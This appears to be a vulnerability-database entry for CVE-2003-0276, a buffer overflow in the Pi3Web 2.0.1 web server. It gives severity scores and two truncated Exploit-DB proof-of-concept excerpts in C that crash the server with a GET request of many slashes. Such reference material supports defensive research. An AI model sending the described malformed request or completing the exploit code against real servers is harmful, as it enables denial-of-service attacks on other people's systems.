CVE-2003-0276
published 2003-06-16CVE-2003-0276: Buffer overflow in Pi3Web 2.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a GET request with a large…
PriorityP425medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
11.40%
95.5th percentile
Buffer overflow in Pi3Web 2.0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a GET request with a large number of / characters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pi3 | pi3web | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pi3Web 2.0.1 - Denial of Service (PoC)
exploitdb·2003-04-29
CVE-2003-0276 Pi3Web 2.0.1 - Denial of Service (PoC)
Pi3Web 2.0.1 - Denial of Service (PoC)
---
/* Pi3Web 2.0.1 DoS - Pr00f of concept.
*
* Vulnerable systems: Pi3Web 2.0.1 (maybe others)
* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/
* Patch: no yet.
*
* Info: Pi3Web Server is vulnerable to a denial of Service.
* when a malformed HTTP Request is done the webserver hangs
* due to an stack overflow. GET /////////..[354]../////////
*
* Found by [email protected] 04/26/2003
* Compiled with: lcc-win32 v3.3.
*
*/
#pragma comment (lib,"ws2_32")
#include
#include
#include
#include
char evilbuffer[1024],evilrequest[512],ip[15];
short port=80;
int isalive(int OPT)
{
struct sockaddr_in haxorcitos;
int fd;
haxorcitos.sin_port = htons(port);
haxorcitos.sin_family = AF_INET;
haxorcitos.sin_addr.s_addr = inet_addr(ip);
if ((fd = soc
Exploit-DB
Pi3Web 2.0.1 - GET Denial of Service
exploitdb·2003-04-26
CVE-2003-0276 Pi3Web 2.0.1 - GET Denial of Service
Pi3Web 2.0.1 - GET Denial of Service
---
// source: https://www.securityfocus.com/bid/7555/info
It has been reported that Pi3Web server is prone to a denial of service vulnerability. Reportedly, when a malicious GET request is sent to the Pi3Web server the server will fail. It should be noted that the Unix version has been reported vulnerable, it is not currently known if other platforms are affected.
/*
* Unix Version of the Pi3web DoS.
* ----------------------------------------------------------
* Info: Pi3Web Server is vulnerable to a denial of Service.
* ----------------------------------------------------------
* VULNERABILITY:
* GET ////
#include
#include
#include
#include
#include
void addr_initialize();
int main(int argc, char **argv)
{
int i, port, sd, rc;
char buffer[355];
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=105155818012718&w=2http://marc.info/?l=bugtraq&m=105275789410250&w=2http://www.securityfocus.com/bid/7555https://exchange.xforce.ibmcloud.com/vulnerabilities/11889http://marc.info/?l=bugtraq&m=105155818012718&w=2http://marc.info/?l=bugtraq&m=105275789410250&w=2http://www.securityfocus.com/bid/7555https://exchange.xforce.ibmcloud.com/vulnerabilities/11889
2003-06-16
Published